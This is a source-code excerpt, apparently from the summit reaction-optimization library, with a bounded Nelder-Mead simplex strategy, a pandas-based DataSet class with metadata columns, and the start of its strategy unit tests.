if red_dim or overfull_simplex:
# prepare dimension reduction
if red_dim:
x_iter, overfull_dim = self.upstream_simplex_dim_red(prev_sim, x_iter)
else:
x_iter = None
# save value of dimension reduced
save_dim = prev_sim[0][overfull_dim]
# delete overfull dimension
new_prev_sim = np.delete(prev_sim, overfull_dim, 1)
# delete bounds for overfull dimension
new_bounds = np.delete(bounds, overfull_dim, 0)
# Run one iteration of Nelder-Mead Simplex algorithm for reduced simplex
request, sim, fsim, x_iter = self._minimize_neldermead(
x0=new_prev_sim[0],
x_iter=x_iter,
bounds=new_bounds,
f=prev_fsim,
sim=new_prev_sim,
adaptive=self._adaptive,
)
overfull_simplex, _, _, _, _, _ = self.check_overfull(
request, sim, fsim, bounds
)
if overfull_simplex:
raise NotImplementedError(
"Recursive dimension reduction not implemented yet."
)
# recover dimension after Nelder-Mead Simplex run (to return full request for experiment)
request = np.insert(request, overfull_dim, save_dim, 1)
sim = np.insert(sim, overfull_dim, save_dim, 1)
# follow-up of dimension reduction
x_iter = self.downstream_simplex_dim_red(x_iter, overfull_dim, save_dim)
red_dim = True
# if not overfull and no reduced dimension from previous iteration
else:
red_dim = False
# Circle (suggested point that already has been investigated)
if any(np.array([np.array(memory == x).all(1).any() for x in request])):
## if dimension is reduced and requested point has already been evaluated, recover dimension with
# reflected and translated simplex before dimension reduction
if red_dim:
sim, fsim, request = self.recover_simplex_dim(
sim, red_sim, red_fsim, overfull_dim, bounds, memory, self._dx
)
red_dim = False
rec_dim = True
# raise error
else:
stay_inner = True
# raise NotImplementedError("Circle - point has already been investigated.")
## Only little changes in requested points, xatol = tolerance for changes in x,
# or in function values, fatol = tolerance for changes in f
## TODO: add extra threshold to stop reduced dimension problem and recover dimension
if not initial_run:
xatol = (bounds[:, 1] - bounds[:, 0]) * self._dx
fatol = self._df
if (np.max(np.abs(sim[1:] - sim[0]), 0) <= xatol).all() or (
np.max(np.abs(fsim[0] - fsim[1:])) <= fatol
).any():
if red_dim:
sim, fsim, request = self.recover_simplex_dim(
sim, red_sim, red_fsim, overfull_dim, bounds, memory, self._dx
)
red_dim = False
rec_dim = True
else:
print(
"Warning, internal stopping criterion is reached. "
"Either points of simplex or function values of points of simplex are very close to each other."
)
# add requested points to memory
for p in request.astype(float).tolist():
memory.append(p)
# store parameters of iteration as parameter array
param = [sim, fsim, x_iter, red_dim, red_sim, red_fsim, rec_dim, memory]
param = dict(
sim=sim,
fsim=fsim,
x_iter=x_iter,
red_dim=red_dim,
red_sim=red_sim,
red_fsim=red_fsim,
rec_dim=rec_dim,
memory=memory,
)
# Generate DataSet object with variable values of next experiments
next_experiments = {}
for i, v in enumerate(input_var_names):
next_experiments[v] = request[:, i]
next_experiments = DataSet.from_df(pd.DataFrame(data=next_experiments))
# Violate constraint
mask_valid_next_experiments = self.check_constraints(next_experiments)
if initial_run and not all(mask_valid_next_experiments):
raise ValueError(
"Default initialization failed due to constraints. Please enter an initial simplex with feasible points"
)
if not any(mask_valid_next_experiments):
stay_inner = True
if stay_inner:
            # mark all suggested experiments as invalid; their objective is later set to +/- infinity upstream
next_experiments[("constraint", "DATA")] = False
else:
# add optimization strategy
next_experiments[("constraint", "DATA")] = mask_valid_next_experiments
next_experiments[("strategy", "METADATA")] = ["Nelder-Mead Simplex"] * len(
request
)
x_best = None
f_best = float("inf")
# fbest corresponds to the transformed function values
if not initial_run:
x_best = sim[0]
f_best = fsim[0]
x_best = self.round(x_best, bounds, self._dx)
f_best = int(f_best * 10 ** int(np.log10(1 / self._df))) / 10 ** int(
np.log10(1 / self._df)
)
# next_experiments = np.around(next_experiments, decimals=self._dx)
# Do any necessary transformation back
next_experiments = self.transform.un_transform(
next_experiments, categorical_method="descriptors"
)
return next_experiments, x_best, f_best, param
# implementation partly follows: https://github.com/scipy/scipy/blob/master/scipy/optimize/optimize.py
def _minimize_neldermead(
self,
x0,
bounds,
x_iter=None,
f=None,
sim=None,
initial_simplex=None,
adaptive=False,
**unknown_options
):
"""
Minimization of scalar function of one or more variables using the
Nelder-Mead algorithm.
Options
-------
x0: array_like of shape (1, N)
x_iter:
f:
sim:
initial_simplex : array_like of shape (N + 1, N)
Initial simplex. If given, overrides `x0`.
``initial_simplex[j,:]`` should contain the coordinates of
the jth vertex of the ``N+1`` vertices in the simplex, where
``N`` is the dimension.
adaptive : bool, optional
Adapt algorithm parameters to dimensionality of problem. Useful for
high-dimensional minimization [1].
References
----------
.. [1] <NAME>. and <NAME>.
Implementing the Nelder-Mead simplex algorithm with adaptive
parameters. 2012. Computational Optimization and Applications.
51:1, pp. 259-277
"""
if adaptive:
dim = float(len(x0))
rho = 1
chi = 1 + 2 / dim
psi = 0.75 - 1 / (2 * dim)
sigma = 1 - 1 / dim
else:
rho = 1
chi = 2
psi = 0.5
sigma = 0.5
# TODO: discuss hyperparameter, find literature
zdelt = 0.25
x0 = np.asfarray(x0).flatten()
N = len(x0)
# generate N points based on center point, each point varying in
# one different variable compared to center point -> initial simplex with N+1 points
if initial_simplex is None and sim is None:
sim = np.zeros((N + 1, N), dtype=x0.dtype)
sim[0] = x0
for k in range(N):
y = np.array(x0, copy=True)
y[k] = y[k] + zdelt * 1 / 2 * (bounds[k, 1] - bounds[k, 0])
bool, _, _ = self.check_bounds(y, bounds)
# if point violates bound restriction, change variable in opposite direction
if not bool:
y[k] = y[k] - zdelt * (bounds[k, 1] - bounds[k, 0])
# if point violates constraint, try opposite direction
# if point violates other constraint or bound, calculate max zdelt <zdelt_mod> that meets
# constraint for both direction and choose direction with greater zdelt_mod
# TODO: check constraints
sim[k + 1] = y
return sim, sim, None, None
elif sim is None:
sim = np.asfarray(initial_simplex).copy()
if sim.ndim != 2 or sim.shape[0] != sim.shape[1] + 1:
raise ValueError(
"`initial_simplex` should be an array of shape (N+1,N)"
)
if len(x0) != sim.shape[1]:
raise ValueError(
"Size of `initial_simplex` is not consistent with `x0`"
)
N = sim.shape[1]
else:
sim = np.asfarray(sim).copy()
if sim.ndim != 2 or sim.shape[0] != sim.shape[1] + 1:
raise ValueError(
"`initial_simplex` should be an array of shape (N+1,N)"
)
if len(x0) != sim.shape[1]:
raise ValueError(
"Size of `initial_simplex` is not consistent with `x0`"
)
N = sim.shape[1]
one2np1 = list(range(1, N + 1))
fsim = np.zeros((N + 1,), float)
for k in range(N + 1):
fsim[k] = f[k]
ind = np.argsort(fsim)
fsim = np.take(fsim, ind, 0)
sim = np.take(sim, ind, 0)
# Catch information on previous experiment
if not x_iter:
x_iter = {
"xbar": None,
"xr": None,
"xe": None,
"xc": None,
"xcc": None,
"x_shrink": None,
}
# Iteration
        while True:
if not x_iter["xr"]:
# Centroid point: xbar
xbar = np.add.reduce(sim[:-1], 0) / N
xbar = self.round(xbar, bounds, self._dx)
x_iter["xbar"] = xbar
# Reflection point xr
xr = (1 + rho) * xbar - rho * sim[-1]
for l in range(len(bounds)):
_bool, i, b = self.check_bounds(xr, bounds)
if _bool:
break
else:
tmp_rho = np.min(
np.max(np.abs((bounds[i][b] - xbar[i])))
/ np.max(np.abs((xbar[i] - sim[-1][i])))
)
xr = (1 + tmp_rho) * xbar - tmp_rho * sim[-1]
xr = self.round(xr, bounds, self._dx)
x_iter["xr"] = [xr, None]
return np.asarray([xr]), sim, fsim, x_iter
xr = x_iter["xr"][0]
fxr = x_iter["xr"][1]
doshrink = 0
# if function value of reflected point is better than best point of simplex, determine expansion point
if fxr < fsim[0]:
if not x_iter["xe"]:
# expansion point: xe
xbar = x_iter["xbar"]
xe = xr + chi * xbar - chi * sim[-1]
for l in range(len(bounds)):
_bool, i, b = self.check_bounds(xe, bounds)
if _bool:
break
else:
tmp_chi = np.min(
np.max(np.abs((bounds[i][b] - xr[i])))
/ np.max(np.abs((xbar[i] - sim[-1][i])))
)
xe = xr + tmp_chi * xbar - tmp_chi * sim[-1]
xe = self.round(xe, bounds, self._dx)
if np.array_equal(xe, xr):
x_iter["xe"] = [xe, float("inf")]
else:
x_iter["xe"] = [xe, None]
return np.asarray([xe]), sim, fsim, x_iter
xe = x_iter["xe"][0]
fxe = x_iter["xe"][1]
# if expansion point is better than reflected point,
# replace worst point of simplex by expansion point
if fxe < fxr:
sim[-1] = xe
fsim[-1] = fxe
# if reflected point is better than expansion point,
# replace worst point of simplex by reflected point
else:
sim[-1] = xr
fsim[-1] = fxr
# if function value of reflected point is not better than best point of simplex...
else: # fsim[0] <= fxr
# ... but better than second worst point,
# replace worst point of simplex by reflected point
if fxr < fsim[-2]:
sim[-1] = xr
fsim[-1] = fxr
# ... and not better than second worst point
else: # fxr >= fsim[-2]
# Perform contraction
# if reflected point is better than worst point
if fxr < fsim[-1]:
# contracted point: xc
if not x_iter["xc"]:
xbar = x_iter["xbar"]
# avoid division with zero (some coordinates of xbar, xr, and sim[-1] may be identical)
# by applying np.max and np.min
rho = np.min(
np.max(np.abs(xr - xbar))
/ np.max(np.abs((xbar - sim[-1])))
)
xc = (1 + psi * rho) * xbar - psi * rho * sim[-1]
for l in range(len(bounds)):
_bool, i, b = self.check_bounds(xc, bounds)
if _bool:
break
else:
tmp_psi = np.min(
np.max(np.abs((bounds[i][b] - xr[i])))
/ np.max(np.abs((xbar[i] - sim[-1][i])))
)
xc = (
1 + tmp_psi * rho
) * xbar - tmp_psi * rho * sim[-1]
xc = self.round(xc, bounds, self._dx)
if np.array_equal(xc, xr):
x_iter["xc"] = [xc, float("inf")]
else:
x_iter["xc"] = [xc, None]
return np.asarray([xc]), sim, fsim, x_iter
xc = x_iter["xc"][0]
fxc = x_iter["xc"][1]
# if contracted point is better than reflected point
if fxc <= fxr:
sim[-1] = xc
fsim[-1] = fxc
else:
doshrink = 1
# if reflected point is better than worst point
else:
# Perform an inside contraction
if not x_iter["xcc"]:
xbar = x_iter["xbar"]
xcc = (1 - psi) * xbar + psi * sim[-1]
xcc = self.round(xcc, bounds, self._dx)
for l in range(len(bounds)):
_bool, i, b = self.check_bounds(xcc, bounds)
if _bool:
break
else:
tmp_psi = np.min(
np.max(np.abs((bounds[i][b] - xbar[i])))
/ np.max(np.abs((sim[-1][i] - xbar[i])))
)
xcc = (1 - tmp_psi) * xbar + tmp_psi * sim[-1]
xcc = self.round(xcc, bounds, self._dx)
if np.array_equal(xcc, xr):
x_iter["xcc"] = [xcc, None]
else:
x_iter["xcc"] = [xcc, None]
return np.asarray([xcc]), sim, fsim, x_iter
xcc = x_iter["xcc"][0]
fxcc = x_iter["xcc"][1]
if fxcc < fsim[-1]:
sim[-1] = xcc
fsim[-1] = fxcc
else:
doshrink = 1
# shrink simplex for all x
if doshrink:
x_shrink = []
x_shrink_f = []
if not x_iter["x_shrink"]:
for j in one2np1:
sim[j] = sim[0] + sigma * (sim[j] - sim[0])
xj = sim[j]
xj = self.round(xj, bounds, self._dx)
x_shrink.append(xj)
x_shrink_f.append([xj, None])
x_iter["x_shrink"] = x_shrink_f
return np.asarray(x_shrink), sim, fsim, x_iter
for j in one2np1:
sim[j] = x_iter["x_shrink"][j - 1][0]
fsim[j] = x_iter["x_shrink"][j - 1][1]
x_iter = {
"xbar": None,
"xr": None,
"xe": None,
"xc": None,
"xcc": None,
"x_shrink": None,
}
ind = np.argsort(fsim)
sim = np.take(sim, ind, 0)
fsim = np.take(fsim, ind, 0)
# Function to check whether a point x lies within the variable bounds of the domain
def check_bounds(self, x, bounds):
for i, b in enumerate(bounds):
upper_b = b[1] < x[i]
lower_b = b[0] > x[i]
# Point violated bound constraints
if upper_b or lower_b:
if lower_b:
return False, i, 0
else:
return False, i, 1
return True, None, None
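    # Return convention of check_bounds: (True, None, None) if x satisfies all bounds,
    # (False, i, 0) if x[i] falls below the lower bound, (False, i, 1) if it exceeds the upper bound.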
# Function to check whether a point meets the constraints of the domain
def check_constraints(self, tmp_next_experiments):
constr_mask = np.asarray([True] * len(tmp_next_experiments)).T
if len(self.domain.constraints) > 0:
constr = [c.constraint_type + "0" for c in self.domain.constraints]
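            # Illustrative example: a constraint with lhs "x1 + x2 - 1" and constraint_type "<="
            # is evaluated as the expression "x1 + x2 - 1<=0" against the candidate experiments.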
constr_mask = [
pd.eval(c.lhs + constr[i], resolvers=[tmp_next_experiments])
for i, c in enumerate(self.domain.constraints)
]
constr_mask = np.asarray([c.tolist() for c in constr_mask]).T
constr_mask = constr_mask.all(1)
return constr_mask
    # Function to check whether a simplex contains only points that are identical in one dimension and
    # the variable value for this dimension corresponds to the bound value
def check_overfull(self, tmp_request, tmp_sim, tmp_fsim, bounds):
test_sim = np.asarray(tmp_sim[:-1])
overfull_sim_dim = np.all(test_sim == test_sim[0, :], axis=0)
for i in range(len(overfull_sim_dim)):
if overfull_sim_dim[i]:
if tmp_request[0][i] == test_sim[0][i]:
if any(bounds[i] == test_sim[0][i]):
overfull_dim = i
prev_sim = tmp_sim[:-1]
prev_fsim = tmp_fsim[:-1]
red_sim = tmp_sim
red_fsim = tmp_fsim
return (
True,
prev_sim,
prev_fsim,
red_sim,
red_fsim,
overfull_dim,
)
else:
raise ValueError(
"Simplex is overfull in one dimension. Please increase threshold for stopping."
)
return False, None, None, None, None, None
# Prepare Nelder-Mead parameters and previous results for dimension reduction by removing overfull dimension
def upstream_simplex_dim_red(self, tmp_prev_sim, tmp_x_iter):
tmp_x_iter = tmp_x_iter
overfull_sim_dim = np.all(tmp_prev_sim == tmp_prev_sim[0, :], axis=0)
overfull_dim = np.where(overfull_sim_dim)[0][0]
if tmp_x_iter:
for key, value in tmp_x_iter.items():
if value is not None:
if key is "xbar":
tmp_x_iter[key] = np.delete(value, overfull_dim)
continue
if key is "x_shrink":
for v in range(len(value)):
tmp_x_iter[key][v] = [
np.delete(value[v][0], overfull_dim),
value[v][1],
]
continue
tmp_x_iter[key] = [np.delete(value[0], overfull_dim), value[1]]
return tmp_x_iter, overfull_dim
else:
return None, overfull_dim
# Restore simplex after one call of Nelder-Mead with reduced dimension by adding overfull dimension.
    ## Note that if the dimension reduction process is not finished, the simplex will be reduced in the
# next Nelder-Mead call again.
def downstream_simplex_dim_red(self, tmp_x_iter, overfull_dim, save_dim):
for key, value in tmp_x_iter.items():
if value is not None:
if key is "xbar":
tmp_x_iter[key] = np.insert(value, overfull_dim, save_dim)
continue
if key is "x_shrink":
for v in range(len(value)):
tmp_x_iter[key][v] = [
np.insert(value[v][0], overfull_dim, save_dim),
value[v][1],
]
continue
tmp_x_iter[key] = [
np.insert(value[0], overfull_dim, save_dim),
value[1],
]
return tmp_x_iter
    ## Reflect and translate the simplex from the iteration before dimension reduction with respect to the point
    # that was found in the reduced-dimension problem.
def recover_simplex_dim(
self, tmp_sim, tmp_red_sim, tmp_red_fsim, overfull_dim, bounds, memory, dx
):
    ## Translate all points of the simplex from before the reduction, except the one that caused the dimension
    # reduction, along the axis of the reduced dimension (the translation distance corresponds to the distance
    # from the point that caused the dimension reduction to the values of all other points along that axis)
xr_red_dim = tmp_red_sim[-1][overfull_dim] - tmp_red_sim[0][overfull_dim]
xr_red_dim = self.round(
xr_red_dim, np.asarray([len(bounds) * [float("-inf"), float("inf")]]), dx
)
new_sim = tmp_red_sim.copy()
new_sim[:-1][:, [overfull_dim]] = (
tmp_red_sim[:-1][:, [overfull_dim]] + xr_red_dim
)
    ## Translate all points of the simplex from before the reduction, except the one that caused the dimension
    # reduction, along the remaining axes (the translation distance corresponds to the distance from the point
    # that caused the dimension reduction to the optimal point found in the reduced-space optimization)
for dim in range(len(tmp_red_sim[0])):
if dim == overfull_dim:
continue
else:
xt_red_dim = tmp_red_sim[-1][dim] - tmp_sim[0][dim]
xt_red_dim = self.round(
xt_red_dim,
np.asarray([len(bounds) * [float("-inf"), float("inf")]]),
dx,
)
for s in range(len(new_sim[:-1])):
xs = tmp_red_sim[s][dim] - xt_red_dim
# TODO: check bounds here, what happens if more points violate bound constraints)
if bounds[dim][0] > xs:
xs = bounds[dim][0]
elif bounds[dim][1] < xs:
xs = bounds[dim][1]
new_sim[s][dim] = xs
        # Alter the simplex in case one point appears twice in the recovered simplex due to bound constraints
p = 0
c_i = 0
while p < len(new_sim) and c_i < len(new_sim):
l_new_sim = new_sim.tolist()
x = l_new_sim.count(l_new_sim[p])
if x > 1:
t_x = l_new_sim[p]
for dim in range(len(t_x)):
if t_x[dim] == bounds[dim, 0]:
new_sim[p][dim] = new_sim[p][dim] + 0.25 * 1 / 2 * (
bounds[dim, 1] - bounds[dim, 0]
)
new_sim[p] = self.round(new_sim[p], bounds, self._dx)
p = 0
c_i += 1
elif t_x[dim] == bounds[dim, 1]:
new_sim[p][dim] = new_sim[p][dim] - 0.25 * 1 / 2 * (
bounds[dim, 1] - bounds[dim, 0]
)
new_sim[p] = self.round(new_sim[p], bounds, self._dx)
p = 0
c_i += 1
else:
c_i += 1
else:
p += 1
new_sim[-1] = tmp_sim[0]
sim = new_sim
fsim = tmp_red_fsim
fsim[-1] = fsim[0]
request = sim[:-1]
if any((memory == x).all(1).any() for x in request):
len_req = len(request)
len_req_mod = len_req
i = 0
while i < len_req_mod:
if (memory == request[i]).all(1).any():
fsim[i + len_req - len_req_mod] = float("inf")
request = np.delete(request, i, 0)
len_req_mod -= 1
else:
i += 1
if len_req_mod == 0:
raise ValueError(
"Recovering dimension failed due to error in generating new points. "
"Please increase threshold for stopping."
)
return sim, fsim, request
# adapted from the SQSnobFit package
def round(self, x, bounds, dx):
"""
function x = round(x, bounds, dx)
A point x is projected into the interior of [u, v] and x[i] is
rounded to the nearest integer multiple of dx[i].
Input:
x vector of length n
bounds matrix of length nx2 such that bounds[:,0] < bounds[:,1]
dx float
Output:
x projected and rounded version of x
"""
u = bounds[:, 0]
v = bounds[:, 1]
x = np.minimum(np.maximum(x, u), v)
x = np.round(x / dx) * dx
i1 = self.find(x < u)
if i1.size > 0:
x[i1] = x[i1] + dx
i2 = self.find(x > v)
if i2.size > 0:
x[i2] = x[i2] - dx
return x
# adapted from the SQSnobFit package
def find(self, cond_array):
return (np.transpose(np.nonzero(cond_array.flatten()))).astype(int)
```
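The `round` helper at the end of the file above projects a candidate point into the box bounds and snaps it to the `dx` grid before the bound-overshoot correction. A standalone sketch of just that projection step (the function name and values below are illustrative, not part of the library):
```python
import numpy as np
def project_and_snap(x, bounds, dx):
    # Clip each coordinate into [lower, upper], then snap to the nearest multiple of dx,
    # mirroring the first two steps of the round() method above.
    lower, upper = bounds[:, 0], bounds[:, 1]
    x = np.minimum(np.maximum(x, lower), upper)
    return np.round(x / dx) * dx
bounds = np.array([[0.0, 1.0], [0.0, 1.0]])
print(project_and_snap(np.array([1.20, 0.333]), bounds, 0.05))  # -> [1.   0.35]
```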
#### File: summit/utils/dataset.py
```python
import pandas as pd
import numpy as np
from typing import List
class DataSet(pd.core.frame.DataFrame):
"""A represenation of a dataset
This is basically a pandas dataframe with a set of "metadata" columns
that will be removed when the dataframe is converted to a numpy array
Two-dimensional size-mutable, potentially heterogeneous tabular data
structure with labeled axes (rows and columns). Arithmetic operations
align on both row and column labels. Can be thought of as a dict-like
container for Series objects. The primary pandas data structure.
Parameters
----------
data : ndarray (structured or homogeneous), Iterable, dict, or DataFrame
Dict can contain Series, arrays, constants, or list-like objects
.. versionchanged :: 0.23.0
If data is a dict, argument order is maintained for Python 3.6
and later.
index : Index or array-like
Index to use for resulting frame. Will default to RangeIndex if
no indexing information part of input data and no index provided
columns : Index or array-like
Column labels to use for resulting frame. Will default to
RangeIndex (0, 1, 2, ..., n) if no column labels are provided
metadata_columns : Array-like
A list of metadata columns that are already contained in the columns parameter.
dtype : dtype, default None
Data type to force. Only a single dtype is allowed. If None, infer
copy : boolean, default False
Copy data from inputs. Only affects DataFrame / 2d ndarray input
See Also
--------
DataFrame.from_records : Constructor from tuples, also record arrays.
DataFrame.from_dict : From dicts of Series, arrays, or dicts.
DataFrame.from_items : From sequence of (key, value) pairs
pandas.read_csv, pandas.read_table, pandas.read_clipboard.
Notes
----
Based on https://notes.mikejarrett.ca/storing-metadata-in-pandas-dataframes/
"""
def __init__(
self,
data=None,
index=None,
columns=None,
metadata_columns=[],
units=None,
dtype=None,
copy=False,
):
# Column multindex level names
level_names = ["NAME", "TYPE"]
        if units:
            level_names.append("UNITS")
if isinstance(columns, pd.MultiIndex):
pass
elif columns is not None:
column_names = columns
if metadata_columns:
types = [
"METADATA" if x in metadata_columns else "DATA"
for x in column_names
]
else:
types = ["DATA" for _ in range(len(column_names))]
arrays = [column_names, types]
if units:
arrays.append(units)
tuples = list(zip(*arrays))
columns = pd.MultiIndex.from_tuples(tuples, names=level_names)
pd.core.frame.DataFrame.__init__(
self, data=data, index=index, columns=columns, dtype=dtype, copy=copy
)
@staticmethod
def from_df(df: pd.DataFrame, metadata_columns: List = [], units: List = []):
"""Create Dataset from a pandas dataframe
Arguments
----------
df: pandas.DataFrame
Dataframe to be converted to a DataSet
metadata_columns: list, optional
names of the columns in the dataframe that are metadata columns
units: list, optional
A list of objects representing the units of the columns
"""
column_names = df.columns.to_numpy()
if metadata_columns:
types = [
"METADATA" if x in metadata_columns else "DATA" for x in df.columns
]
else:
types = ["DATA" for _ in range(len(column_names))]
arrays = [column_names, types]
levels = ["NAME", "TYPE"]
if units:
arrays.append(units)
levels.append("UNITS")
tuples = list(zip(*arrays))
columns = pd.MultiIndex.from_tuples(tuples, names=levels)
return DataSet(df.to_numpy(), columns=columns, index=df.index)
@staticmethod
def read_csv(filepath_or_buffer, **kwargs):
"""Create a DataSet from a csv"""
header = kwargs.get("header", [0, 1])
index_col = kwargs.get("index_col", 0)
df = pd.read_csv(filepath_or_buffer, header=header, index_col=index_col)
return DataSet(df.to_numpy(), columns=df.columns, index=df.index)
def to_dict(self, **kwargs):
orient = kwargs.get("orient", "split")
return super().to_dict(orient=orient)
@classmethod
def from_dict(cls, d):
columns = []
metadata_columns = []
for c in d["columns"]:
if c[1] == "METADATA":
metadata_columns.append(c[0])
columns = [c[0] for c in d["columns"]]
return DataSet(
d["data"],
index=d["index"],
columns=columns,
metadata_columns=metadata_columns,
)
def zero_to_one(self, small_tol=1.0e-5, return_min_max=False) -> np.ndarray:
"""Scale the data columns between zero and one
Each of the data columns is scaled between zero and one
based on the maximum and minimum values of each column
Arguments
---------
small_tol: float, optional
The minimum value of any value in the final scaled array.
This is used to prevent very small values that will cause
            issues in later calculations. Defaults to 1e-5.
Returns
-------
scaled: numpy.ndarray
A numpy array with the scaled data columns
if return_min_max true returns a tuple of scaled, mins, maxes
Notes
-----
This method does not change the internal values of the data columns in place.
"""
values = self.data_to_numpy()
values = values.astype(np.float64)
maxes = np.max(values, axis=0)
mins = np.min(values, axis=0)
ranges = maxes - mins
scaled = (values - mins) / ranges
scaled[abs(scaled) < small_tol] = 0.0
if return_min_max:
return scaled, mins, maxes
else:
return scaled
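    # Hedged usage note (illustrative numbers, not from the library docs): a data
    # column holding [10., 20., 30.] is mapped by zero_to_one() to [0., 0.5, 1.];
    # with return_min_max=True the per-column mins and maxes are returned as well,
    # so the identical scaling can be reapplied to new data.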
def standardize(
self, small_tol=1.0e-5, return_mean=False, return_std=False, **kwargs
) -> np.ndarray:
"""Standardize data columns by removing the mean and scaling to unit variance
The standard score of each data column is calculated as:
z = (x - u) / s
where `u` is the mean of the columns and `s` is the standard deviation of
each data column
Parameters
----------
small_tol: float, optional
The minimum value of any value in the final scaled array.
This is used to prevent very small values that will cause
            issues in later calculations. Defaults to 1e-5.
return_mean: bool, optional
Return an array with the mean of each column in the DataSet
return_std: bool, optional
            Return an array with the standard deviation of each column
in the DataSet
mean: array, optional
Pass a precalculated array of means for the columns
std: array, optional
Pass a precalculated array of standard deviations
for the columns
Returns
-------
standard: np.ndarray
Numpy array of the standardized data columns
Notes
-----
This method does not change the internal values of the data columns in place.
"""
values = self.data_to_numpy()
values = values.astype(np.float64)
mean = kwargs.get("mean", np.mean(values, axis=0))
sigma = kwargs.get("std", np.std(values, axis=0))
standard = (values - mean) / sigma
standard[abs(standard) < small_tol] = 0.0
if return_mean and return_std:
return standard, mean, sigma
elif return_mean:
return standard, mean
elif return_std:
return standard, sigma
else:
return standard
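    # Hedged usage note (illustrative numbers): a column holding [1., 2., 3.]
    # standardizes to (x - 2.0) / np.std([1., 2., 3.]) ~= [-1.225, 0., 1.225];
    # passing mean= and std= reuses a previously computed scaling, for example
    # one fitted on a training split.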
@property
def _constructor(self):
return DataSet
def __getitem__(self, key):
is_mi_columns = isinstance(self.columns, pd.MultiIndex)
if is_mi_columns and "NAME" in self.columns.names and type(key) == str:
tupkey = [x for x in self.columns if x[0] == key]
if len(tupkey) == 1:
key = tupkey[0]
elif len(tupkey) > 1:
raise ValueError("NAME level column labels must be unique")
return super().__getitem__(key)
def __unicode__(self):
is_mi_columns = isinstance(self.columns, pd.MultiIndex)
if is_mi_columns and "NAME" in self.columns.names:
newdf = self.copy()
newdf.columns = self.columns.get_level_values("NAME")
return newdf.__unicode__()
return super().__unicode__()
def _repr_html_(self):
is_mi_columns = isinstance(self.columns, pd.MultiIndex)
if is_mi_columns and "NAME" in self.columns.names:
newdf = self.copy()
columns = self.columns.get_level_values("NAME").to_numpy()
newdf.columns = columns
return newdf._repr_html_()
return super()._repr_html_()
    def data_to_numpy(self) -> np.ndarray:
        """Return the data as a numpy array with the metadata columns removed"""
result = super().to_numpy()
metadata_columns = []
for i, column in enumerate(self.columns):
if column[1] == "METADATA":
metadata_columns.append(i)
mask = np.ones(len(self.columns), dtype=bool)
mask[metadata_columns] = False
return result[:, mask]
@property
def metadata_columns(self):
"""Names of the metadata columns"""
return [column[0] for column in self.columns if column[1] == "METADATA"]
@property
def data_columns(self):
"""Names of the data columns"""
return [column[0] for column in self.columns if column[1] == "DATA"]
def insert(
self, loc, column, value, type="DATA", units=None, allow_duplicates=False
):
super().insert(loc, (column, type), value, allow_duplicates)
```
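A minimal usage sketch of the `DataSet` class above (column names and values are invented for illustration; the import path matches the one used in the tests below):
```python
from summit.utils.dataset import DataSet
ds = DataSet(
    [[60.0, 0.5, "run_1"], [80.0, 0.3, "run_2"]],
    columns=["temperature", "flowrate_a", "label"],
    metadata_columns=["label"],
)
print(ds.data_columns)       # ['temperature', 'flowrate_a']
print(ds.metadata_columns)   # ['label']
print(ds.data_to_numpy())    # the METADATA column is dropped -> shape (2, 2)
```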
#### File: summit/tests/test_strategies.py
```python
import pytest
from summit.benchmarks import *
from summit.domain import *
from summit.utils.dataset import DataSet
from summit.utils.multiobjective import pareto_efficient, hypervolume
from summit.strategies import *
import GPy
from fastprogress.fastprogress import progress_bar
import numpy as np
import os
import warnings
import pkg_resources
def test_strategy():
class MockStrategy(Strategy):
def suggest_experiments(self, num_experiments, previous_results):
inputs, outputs = self.transform.transform_inputs_outputs(previous_results)
objectives = [v for v in self.domain.variables if v.is_objective]
assert len(objectives) == 1
assert objectives[0].name == "scalar_objective"
assert outputs["scalar_objective"].iloc[0] == 70.0
return self.transform.un_transform(inputs)
def reset(self):
pass
def test_random():
domain = Domain()
domain += ContinuousVariable(
name="temperature",
description="reaction temperature in celsius",
bounds=[50, 100],
)
domain += ContinuousVariable(
name="flowrate_a", description="flow of reactant a in mL/min", bounds=[0.1, 0.5]
)
domain += ContinuousVariable(
name="flowrate_b", description="flow of reactant b in mL/min", bounds=[0.1, 0.5]
)
strategy = Random(domain, random_state=np.random.RandomState(3))
results = strategy.suggest_experiments(5)
arr = np.array(
(
[
[77.53989513, 0.45851724, 0.11195048],
[85.40739113, 0.15023412, 0.28273329],
[64.54523695, 0.18289715, 0.35965762],
[75.54138026, 0.12058688, 0.21139491],
[94.64734772, 0.27632394, 0.37050196],
]
)
)
results_arr = results.data_to_numpy().astype(np.float32)
    assert np.allclose(results_arr, arr)
solvent_ds = DataSet(
[[5, 81], [-93, 111]],
index=["benzene", "toluene"],
columns=["melting_point", "boiling_point"],
)
domain += CategoricalVariable(
"solvent", "solvent descriptors", descriptors=solvent_ds
)
strategy = Random(domain, random_state=np.random.RandomState(3))
results = strategy.suggest_experiments(5)
return results
def test_lhs():
domain = Domain()
domain += ContinuousVariable(
name="temperature",
description="reaction temperature in celsius",
bounds=[50, 100],
)
domain += ContinuousVariable(
name="flowrate_a", description="flow of reactant a in mL/min", bounds=[0.1, 0.5]
)
domain += ContinuousVariable(
name="flowrate_b", description="flow of reactant b in mL/min", bounds=[0.1, 0.5]
)
strategy = LHS(domain, random_state=np.random.RandomState(3))
results = strategy.suggest_experiments(5)
arr = np.array(
[
[95.0, 0.46, 0.38],
[65.0, 0.14, 0.14],
[55.0, 0.22, 0.3],
[85.0, 0.3, 0.46],
[75.0, 0.38, 0.22],
]
)
results_arr = results.data_to_numpy().astype(np.float32)
    assert np.allclose(results_arr, arr)
solvent_ds = DataSet(
[[5, 81], [-93, 111]],
index=["benzene", "toluene"],
columns=["melting_point", "boiling_point"],
)
domain += CategoricalVariable(
"solvent", "solvent descriptors", descriptors=solvent_ds
)
strategy = LHS(domain, random_state=np.random.RandomState(3))
results = strategy.suggest_experiments(5)
return results
def test_doe():
domain = Domain()
domain += ContinuousVariable(
name="temperature",
description="reaction temperature in celsius",
bounds=[50, 100],
)
domain += ContinuousVariable(
name="flowrate_a", description="flow of reactant a in mL/min", bounds=[0.1, 0.5]
)
domain += ContinuousVariable(
name="flowrate_b", description="flow of reactant b in mL/min", bounds=[0.1, 0.5]
)
domain += ContinuousVariable(
name="yield_", description="", bounds=[0, 100], is_objective=True, maximize=True
)
domain += ContinuousVariable(
name="de",
description="diastereomeric excess",
bounds=[0, 100],
is_objective=True,
maximize=True,
)
strategy = FullFactorial(domain)
levels = dict(temperature=[50, 100], flowrate_a=[0.1, 0.5], flowrate_b=[0.1, 0.5])
experiments = strategy.suggest_experiments(levels)
return experiments
def test_multitosingleobjective_transform():
class MockStrategy(Strategy):
def suggest_experiments(self, num_experiments, previous_results):
